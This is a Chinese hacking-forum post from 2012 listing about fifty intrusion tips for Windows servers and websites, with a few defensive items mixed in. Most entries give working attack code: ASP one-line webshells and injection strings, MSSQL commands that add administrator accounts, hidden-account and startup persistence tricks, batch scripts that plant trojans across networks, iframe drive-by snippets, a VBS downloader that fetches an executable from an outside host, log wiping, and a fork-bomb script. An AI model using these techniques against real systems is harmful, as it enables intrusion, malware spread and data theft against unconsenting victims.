中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,! ]# m% x1 K8 [5 t' a
cacls C:\windows\system32 /G hqw20:R4 g- x( W9 h! |  z$ g8 m- ^0 j
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
% p" Q$ Z: h" q! m5 H. s5 P. j7 E恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
/ n3 O: Y$ a5 C1 \; Q' S8 H! u7 n3 s5 T! h. u
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ Y/ V2 s( l6 s% B2 l/ n0 x) K7 k3 ~6 }  @* @
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。8 ?1 E6 o0 n* ^' w8 A

. v( j7 \5 u9 I/ n4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号1 Z5 ~' S9 F, |! G5 N, p; U

  A3 O  G2 ]% P5、利用INF文件来修改注册表
4 X/ ^! u2 r+ ?$ c# c[Version]1 t% z; n/ V& x8 G  t6 `
Signature="$CHICAGO$"  h4 m- h! F, t* d- K$ N
[Defaultinstall]+ {% h- a# }1 K! R, C6 d9 j+ u
addREG=Ating1 W7 z& J8 l: {# j9 g
[Ating]
) E" ~; t, K, M' |, |HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
2 O6 v- ~9 [3 `+ r2 {4 D* I$ d以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:6 h  `4 ?' D' `% |# G- y
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径5 n! d0 d* z; k) N% I
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
! Q  b1 T1 z+ ?' W3 v* bHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU$ W# U$ ^( ]7 W
HKEY_CURRENT_CONFIG 简写为 HKCC, J% v% S0 l# ]
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
9 `9 [0 Z) [+ `1 p4 |' Q"1"这里代表是写入或删除注册表键值中的具体数据! q# }$ r- Y" Q
! M& g  s' w  ~9 Y4 u- T
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,) T, `& M; Q% n8 I/ u
多了一步就是在防火墙里添加个端口,然后导出其键值
' K" ?! \  R/ K( Z+ K2 P1 Z, f[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]: E: ?* ?4 }" v
! c. I6 L% Q/ d# Y2 @& F+ E: t
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
1 r) ~' m; X: {1 Y( m5 m$ A在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
! x; Q* \8 a0 M; L) Q; m, t# X4 O9 ^7 h3 o! ^
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。0 t3 j& b2 ?+ `* @  w5 ^

# q/ T; h( t" B2 X" I6 s9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, i% Q/ E' i. Q& s5 ~2 M0 k' ?可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。/ R. G+ V7 J1 E/ ~

& N' s4 F4 Z) w% V/ L' [/ E1 @10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”+ Z9 A0 w3 e. |" l

; n" P; p: m, z7 q/ Q. t11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! C3 u3 k4 N7 b+ z用法:xsniff –pass –hide –log pass.txt- a' D; c* ]! o# j

4 e: X7 S% j* }; G# y% M5 X1 m12、google搜索的艺术
3 E3 S2 t- v3 s2 v4 Z8 B0 h# Q搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
1 C. g; K8 b- c- |5 C* i" i% U2 B或“字符串的语法错误”可以找到很多sql注入漏洞。
( e  P9 A0 ^1 A" z% O
3 _/ O- G) X4 V8 |  k$ r13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) C% t! K4 f  M/ `0 j* m2 S) U9 C1 b2 g' ^& I1 B9 F
14、cmd中输入 nc –vv –l –p 19876 x: u0 w" E* ]! ?; X0 X
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃& Q! o4 K; g, X6 G

4 Y9 M) c: b% c: R( q15、制作T++木马,先写个ating.hta文件,内容为  a/ ?  T% A6 H, J% ]" J6 m
<script language="VBScript">
5 a; p+ ~, {4 @# I2 uset wshshell=createobject ("wscript.shell" )
3 m0 a5 f# e1 c* {% Ya=wshshell.run("你马的名称",1); ~- p) a% `( Q7 h- e
window.close5 G7 H6 z$ E: I3 T
</script>) O4 z# m8 B) h) [' n- z
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 ~. j; H8 z3 D/ C* P) I) b

7 k( F% g5 h' @' Y; m8 q3 [7 u16、搜索栏里输入
  W7 k  g4 {4 z关键字%'and 1=1 and '%'='
# T6 {8 x- J# A  L$ q关键字%'and 1=2 and '%'=') _; o2 f7 t  D0 `# q
比较不同处 可以作为注入的特征字符
  M  \" C/ E7 m2 X1 X/ |8 c7 G  x7 U, j5 b/ u
17、挂马代码<html>, S( L. b" K/ Q- G3 D* t$ Y
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
5 [( t. Y$ ?7 F. R/ F" M</html>- {$ Y" W# @. B# R9 `
2 _5 s) G, i- x( u0 [0 L
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
. Y8 q; c: X2 ^' s5 ^: b! H) v: ]net localgroup administrators还是可以看出Guest是管理员来。
; m0 Y* X$ X6 u- M1 h' [3 ?- Z0 `& |$ V1 P$ g' J, [+ `% E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
# m+ s! V( x6 J  h" N用法: 安装: instsrv.exe 服务名称 路径
+ \6 _5 p: R5 Z卸载: instsrv.exe 服务名称 REMOVE
. \) o9 ~$ P) ^4 B! j7 F, B
# k+ s; p  n' Q8 ~2 {6 h. R/ T# f$ d" |) \! q5 G: b
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 K3 y" Z( h" X不能注入时要第一时间想到%5c暴库。
+ l" \0 @4 p6 ^  ~4 Y# T% ?
7 c& }5 t! ^' ^- q22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 l, O+ i$ d7 `! h. ]- m% b, I

7 `1 K) W5 i" o7 ?2 o; r) V23、缺少xp_cmdshell时
9 d! }/ q/ N8 G6 i6 C& w尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( _2 t! S9 Q$ `5 z$ T0 D
假如恢复不成功,可以尝试直接加用户(针对开3389的), Q- M4 _1 n8 J' B
declare @o int  O8 V% U+ F& b; q, l
exec sp_oacreate 'wscript.shell',@o out
% x' F. k/ ~; Y: cexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 G, ~& H5 ^" K& Y3 t
& F! r  ~; v2 J% {6 o! t! Y) ]24.批量种植木马.bat5 A' G9 Q5 u* ~' J
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
1 h0 j( r8 m& K* Y5 N8 U# j# lfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 S& V0 {$ p* e0 A( E
扫描地址.txt里每个主机名一行 用\\开头
6 b/ U* T; _. H  |3 ^8 N% J3 n9 w# o, ]! @  S3 F- `
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! Y9 |$ ?. x8 O: o; ?
6 O- `& F3 j) C$ T7 R+ t26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.& {2 E3 T% D% L* z1 s8 Y0 S
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( ]9 h' J* f* l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 `( R. K) O* H# Z  L
5 @# e, T+ A2 a5 J# v27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP0 `) Y' G  j8 R
然后用#clear logg和#clear line vty *删除日志4 v1 ~* P- h* p0 w% [& t5 B4 ]
6 X# p" v' i: z
28、电脑坏了省去重新安装系统的方法
. ^9 y: P! b* k3 H9 k3 l纯dos下执行,$ I& l3 E3 m3 B. K, z
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" L7 M6 y- i2 _8 Y* d7 F& U' X5 G+ i2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
% l% P! }& Z5 i* `7 ]( d
2 c' b! r* v8 R7 b4 Y4 g* Z- s29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 D& r- K& R; @  BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. a. P  D4 W; ^3 y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' b* S1 s. D' ^6 C1 x
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ G9 a1 t9 O4 |8 F8 }/ M0 P
分别用6 V' C2 }; t- ?1 }  h! e8 x/ \
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( k) x0 Z7 [" q- R* H+ G
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ |- V6 L4 Q6 H, Yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" s+ `+ `$ F( O$ o9 g) Z
命令来导出注册表项( s; Q; X9 @% z! ~
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
, U; F0 \" u) z改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% S6 R- n2 U9 _; Fregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。- C0 D1 ]& \( Q$ I: g4 [9 ~8 g8 t

  ~! X! k; c! e' ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U. e/ `1 z% \& L% \  m. V
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 i) V# u! |/ ]' p8 D6 b) A: N- J- x) g: e! e) z# O0 U, o
31、全手工打造开3389工具+ _  g! W$ i) A4 Q/ \/ |: s
打开记事本,编辑内容如下:
+ c% i7 G, |6 r2 {echo [Components] > c:\sql: D* ]. b8 I" L8 U0 G7 Z9 Y
echo TSEnable = on >> c:\sql
, N$ _6 x7 m  A" z; V3 e* Ssysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
: K% F8 F0 `' e7 o编辑好后存为BAT文件,上传至肉鸡,执行. L1 J/ c4 B5 m  _9 g
! H5 E3 @' m) F( l( n
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马1 S. {/ m( j2 }: C8 _- `

$ U3 D2 I) b2 s. W33、让服务器重启1 l) J& e- t* y2 d/ G1 O
写个bat死循环:
% x5 J% ^" n( e0 M& C( ~* c@echo off4 e$ i/ y  z3 `: |  W) b
:loop1; {; r. Y' B7 \
cls
% z" y2 R+ Q. D; f& z5 Ostart cmd.exe
$ R4 d+ H$ I- ]. Y. U& k6 ~8 qgoto loop18 M  x+ `+ @0 h/ \% m
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" y5 i5 T. v- P" z
- N( \/ O/ i4 r6 O34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! S" [8 T( W# a( B@echo off
/ ?; v& [& X3 `; W, ~& b# ]5 }date /t >c:/3389.txt
9 P3 P; c) U& q% Y1 S' \0 r# Qtime /t >>c:/3389.txt
+ @0 B/ y( Q% A/ oattrib +s +h c:/3389.bat
1 L, m! V+ @. R  s; z( A" Kattrib +s +h c:/3389.txt0 {. ^0 e- H0 f" \3 Q: E
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt2 b5 g: [& f5 F- L5 r6 o$ A# P8 w0 o( S
并保存为3389.bat6 E) c% ?3 d3 ~8 O& V1 f7 V7 {
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号' k& v; F, M. ^, x  G, |6 ]* }
; _, n0 X/ F4 }8 x
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
  R) G, [. S4 Fstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' i7 Z* K4 E2 Z9 y) S: D: y输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 t4 F- A5 S. C" K

; O+ c0 w: G2 r36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件" Z! k5 F2 }5 V" s  b) j- f
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址) P1 i8 Y' L$ Z! j2 M8 y3 _
echo 你的FTP账号 >>c:\1.bat //输入账号
& c" y3 C' x! A* Y. Eecho 你的FTP密码 >>c:\1.bat //输入密码
4 m! z9 d, `7 uecho bin >>c:\1.bat //登入
) Q# |6 z# ^6 M1 qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
( F  i2 D/ Y6 z! \" A) c' Techo bye >>c:\1.bat //退出4 z  {& E: H2 H% m4 n7 H: Q( |
然后执行ftp -s:c:\1.bat即可
! ]8 d) m; L) q1 t" _5 a( d7 b- i" H9 n4 D" J
37、修改注册表开3389两法# X3 K0 i8 T+ u2 b( ]* ]- s
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
3 m& c8 J% M! C5 j: w4 _. ~/ ?echo Windows Registry Editor Version 5.00 >>3389.reg$ T9 o6 O, V/ D, o3 O
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
" X' J+ D* i) z5 t7 ]  O: necho "Enabled"="0" >>3389.reg, w6 L: Q0 i0 x' V0 `- R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( ?6 Y( I% }7 }7 A! `% uNT\CurrentVersion\Winlogon] >>3389.reg+ c& `3 u- z; G  V: |
echo "ShutdownWithoutLogon"="0" >>3389.reg
- N: o& E  O0 t& ]8 ?1 e4 E4 _echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]/ B1 [; t: @' H; Q4 _$ T
>>3389.reg: S7 w$ i' J; N  g, c! b
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
4 J6 `' g1 D1 u) gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
) K' ]2 t3 I1 }>>3389.reg
7 Z2 L  y8 U9 T" f+ B9 y$ Lecho "TSEnabled"=dword:00000001 >>3389.reg
& ]% z2 N3 P1 M& [' C6 U- ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 n2 u, G0 ?! Q1 `- T
echo "Start"=dword:00000002 >>3389.reg, ~/ O2 p; _% p, X  v1 d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
- y' r- Y; m# H2 G>>3389.reg
; V) Y2 C) F+ E" yecho "Start"=dword:00000002 >>3389.reg
% |/ Y2 U' e/ {% |echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
, b" B0 J9 P( gecho "Hotkey"="1" >>3389.reg' L7 b& `! X, J6 X( a5 H+ l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' L0 F/ o$ Z; d9 A
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
  @. h! \. q$ Pecho "PortNumber"=dword:00000D3D >>3389.reg9 l/ n. N1 R' e3 W: {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& e' I* n+ p9 a/ lServer\WinStations\RDP-Tcp] >>3389.reg# V: \8 v( T! Y8 ?
echo "PortNumber"=dword:00000D3D >>3389.reg4 f: z' I) n! ~' Q- {
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: D/ [1 p" Q0 |& L$ R(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)- u2 O3 R. L& O
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效, _! A- q6 c3 o3 [, r2 Y
(2)winxp和win2003终端开启
- S6 K3 {" L0 {$ b$ F3 v用以下ECHO代码写一个REG文件:
% k" a9 ]- J: o; z$ R1 secho Windows Registry Editor Version 5.00>>3389.reg
3 O) r8 v3 h1 g) ]# \. {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 I, G0 w0 [2 P* R& b4 {
Server]>>3389.reg
& m8 X3 t/ d8 v8 W$ M, jecho "fDenyTSConnections"=dword:00000000>>3389.reg
5 U) y8 _2 u2 ~, Y- N: U, Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! F+ r1 Q( }" r9 c0 ~4 A( u. C6 x* M
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
2 {( v5 R# L! _6 l- a% _6 _' iecho "PortNumber"=dword:00000d3d>>3389.reg
0 u" B: G; k  Q' ~, {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( c8 l) k+ {3 y- x
Server\WinStations\RDP-Tcp]>>3389.reg
1 R; P+ d% w) k* i$ h4 Eecho "PortNumber"=dword:00000d3d>>3389.reg
6 |! o( t; [/ }3 e( s然后regedit /s 3389.reg del 3389.reg
% x, r: A8 ^" H0 t7 c+ HXP下不论开终端还是改终端端口都不需重启- \: C8 n' N' a3 s$ X4 `
, _6 f4 p0 Y" W2 d5 m; Q4 }; X; S
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃8 c" f" _5 B  K: p% ?9 R3 K
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
2 N6 C1 u: Y* a* W  `! q0 a. W. ~  r7 r2 i. W9 O7 c! V
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; J  Z7 B! u+ M+ f# W+ M  ?! ?
(1)数据库文件名应复杂并要有特殊字符) u! c; ]% H* C* c6 W6 q8 {
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
1 N& b+ Y& q( W; r7 D将conn.asp文档中的
" Y6 F. t- y; ]* o( ?  oDBPath = Server.MapPath("数据库.mdb")% _: U- [, ~. n
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
$ @2 ^+ u8 {. }5 J
1 C  J6 W. h8 i0 `# Z: P修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置3 @( s4 `8 |8 c
(3)不放在WEB目录里# k% T1 U" ^0 L! ^# j5 z
3 ?5 ?0 C' A; G" @  O
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉& }+ ?0 K4 H) ~! e7 i
可以写两个bat文件* e- _: \8 s# ]  a$ ?
@echo off
3 o) k0 B9 g9 k8 q* S@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe, ^9 k9 z: c. b/ w; R3 D
@del c:\winnt\system32\query.exe
# r6 \( Y5 @* P7 N  w/ r7 N@del %SYSTEMROOT%\system32\dllcache\query.exe
  s" b! s5 ]. y+ U& s, }@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的7 I: s7 T) ?# W0 s  ?
; V0 g) [0 y- B" |$ s4 o* c0 J: r$ m
@echo off
5 C8 A) x% W0 T@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& v4 R, p, E7 I& D! q5 D- K@del c:\winnt\system32\tsadmin.exe
5 G+ T& J( e+ x9 J@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex/ h1 @, ]( f2 Y; o8 G5 P3 g& A

5 U# U' i2 ~1 w/ y+ @" S' u41、映射对方盘符4 q- U; u8 G4 O4 x( V3 e
telnet到他的机器上,
" u1 |6 K- Q' g* Unet share 查看有没有默认共享 如果没有,那么就接着运行! q( W3 l, N/ ]
net share c$=c:
3 g; y& G  Z* D( e2 w) p' gnet share现在有c$* K, R0 o, H& _& g
在自己的机器上运行" N# h7 f; @) S0 u# P
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
0 Y7 ?2 A6 s0 e2 i; i
& e- J3 H! g3 i0 Y' W42、一些很有用的老知识
- D& V4 m( _7 r: ctype c:\boot.ini ( 查看系统版本 )
- f! [, V% F) m& j$ k. H- n" \- xnet start (查看已经启动的服务)
, T; A$ I0 f& ?8 c4 b% o7 l( m% oquery user ( 查看当前终端连接 )' y% p- |( O$ r( H: A4 f7 R; _
net user ( 查看当前用户 )$ a' Z0 K( y7 c* w. v- c8 Z
net user 用户 密码/add ( 建立账号 )2 i  G5 [9 \. o& E# @. E1 S
net localgroup administrators 用户 /add (提升某用户为管理员)
4 B0 @1 V, v+ Q9 k8 bipconfig -all ( 查看IP什么的 )6 o( Q7 z) b  Y$ ?
netstat -an ( 查看当前网络状态 )
1 u: I" W9 E6 J) k. \) ofindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
5 N1 U, Y5 D' @9 w) b) Q9 C克隆时Administrator对应1F4( M3 h- Y7 j% o, R$ i
guest对应1F57 k" K4 ?  h7 i  y# [0 I  [7 s# `
tsinternetuser对应3E8
$ x9 r$ ?! I$ k5 g  u0 F  M) o: E# V4 A
43、如果对方没开3389,但是装了Remote Administrator Service
2 [/ Q7 u' B9 o7 c. B* s) [$ x' k用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
. J8 `2 g: j7 t解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 j" D: }- @, L) |& \先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% I) e' z9 k5 }7 H4 _9 W! O
. H4 x( n/ R6 r; S44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 S6 |2 Z. d4 u$ j/ e本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* N4 x0 f2 r% s5 p0 }$ u0 T0 o+ T4 {
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- `, t! X9 v$ k( Y; n: x- eecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( g) V; g/ K) k1 o& l. ^
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" r/ U" O. s& G/ ]$ U. cCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
$ D5 S2 p0 Q5 k* h1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs, a' h1 }7 g/ H3 Z$ \
(这是完整的一句话,其中没有换行符)5 @! s2 n  u  h$ c- d  _& j
然后下载:9 |% m# ^3 V. e; u8 O1 g/ X& d
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
2 H6 q& V! Z3 N. W. ~# `$ e( _5 t
0 _1 u  |/ T6 @. ^3 l- f6 e" H46、一句话木马成功依赖于两个条件:
, h0 |% g/ B, A' G1、服务端没有禁止adodb.Stream或FSO组件
6 p# G" |4 g, f% J2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
" G$ e0 d, }( O/ d# b; S: B9 j  x& a( {
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
8 X( O4 y; t: F9 @7 h% D;alter database utsz set RECOVERY FULL--
' m- r2 K8 n3 Q& s* |- N  ^/ R+ x# R;create table cmd (a image)--
/ [: ~8 a( L. g4 Q8 Y;backup log utsz to disk = 'D:\cmd' with init--1 k0 D: W( n# d6 U, H4 w0 ~0 W
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--& \: ~, Y6 ?0 V& a7 M% y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--' m) Q# h3 U8 D# v" l- j
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。/ A: R- j# H! {9 i9 w

( X  Q/ Z5 P5 m2 L48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# ?, P  P+ c0 ~* L1 R- \" r: Z  }5 E0 K2 G" a
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
" F% t9 X6 L% f+ Q4 B8 d所有会话用 'all'。
- X0 l2 [, W3 z: B- k" a) O-s sessionid 列出会话的信息。
( \" i4 |- Z, a1 A" @: u-k sessionid 终止会话。8 a% x2 ]* h7 w4 J. ~* G  m
-m sessionid 发送消息到会话。+ U/ [) @1 F( `. A* s& B

3 i" ?) x4 c. o( hconfig 配置 telnet 服务器参数。! |7 W: S; c9 O& F& I) C

& r: C, T5 Y) h9 C) wcommon_options 为:
0 w/ |4 }# Q# o9 ]: O2 |-u user 指定要使用其凭据的用户4 I9 w" r3 J) _/ @0 O
-p password 用户密码+ O# V5 L  `' o2 p3 v+ K; ?" C

# h' C! ?' E$ T4 Lconfig_options 为:6 h& i2 f" p: r9 u1 ^, I8 A6 m2 n# l
dom = domain 设定用户的默认域
! @$ m( F. [" q4 U: o; r" wctrlakeymap = yes|no 设定 ALT 键的映射
0 I; {, T1 n# I& _5 C$ V/ e* q) jtimeout = hh:mm:ss 设定空闲会话超时值
) L% x3 l. l' J# e4 _timeoutactive = yes|no 启用空闲会话。* V  h8 a- g9 X! r5 |+ \9 ~! @
maxfail = attempts 设定断开前失败的登录企图数。
6 V: m/ B5 k! f: I3 G% Vmaxconn = connections 设定最大连接数。5 H, P) g1 e$ z; K: v
port = number 设定 telnet 端口。
- T4 N4 t! H1 f% D) x: z# n) isec = [+/-]NTLM [+/-]passwd: ]2 A. ~' N& i* i' a6 o! T
设定身份验证机构
' v3 d' j* c# n+ l& q2 r4 hfname = file 指定审计文件名。
- C2 |  g$ u2 f3 K0 e9 K  ~: e) lfsize = size 指定审计文件的最大尺寸(MB)。
9 J: k. n6 A5 M3 z' pmode = console|stream 指定操作模式。: O/ T; C: C. T. o6 A! {% M
auditlocation = eventlog|file|both
( {- w# C" m7 a" Z指定记录地点
! I" j! l$ S' ?6 _; F  ~audit = [+/-]user [+/-]fail [+/-]admin0 T9 L7 `, o1 Y9 t  `

3 s0 K7 U4 Y8 \49、例如:在IE上访问:
& z, o7 A( R" A' A8 ]1 Ewww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 V5 M" |$ A$ e8 a$ Mhack.txt里面的代码是:
: u! ?- ]! `" b7 ]<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
' r1 l, A( V2 k  ?4 L% ^6 ^把这个hack.txt发到你空间就可以了!
1 o9 W+ \  a+ V5 t$ H2 H% i5 ?这个可以利用来做网马哦!' P3 f: k2 Y) M1 T( p

& D% _) C8 l: X; x; O0 @50、autorun的病毒可以通过手动限制!3 L0 G# |4 r" e4 W" g6 F
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' b1 K3 k/ d- l' }+ @- e, d* H! o2,打开盘符用右键打开!切忌双击盘符~/ e: w- U6 F: s0 v$ i3 M
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!! I( ~, D3 x6 L, w
9 A# v4 L3 J( f2 U
51、log备份时的一句话木马:
' r" [( G& Y; m* Y2 q9 j7 _& Ca).<%%25Execute(request("go"))%%25>
: t" U* v5 `( E1 A! gb).<%Execute(request("go"))%>$ O! i4 i+ W9 k% J( m$ ^" r
c).%><%execute request("go")%><%$ ~  |, X8 M( h) M: i
d).<script language=VBScript runat=server>execute request("sb")</Script>
) _6 ~% W0 E9 r! x' De).<%25Execute(request("l"))%25>4 R& |  O% Q4 g6 y5 ]
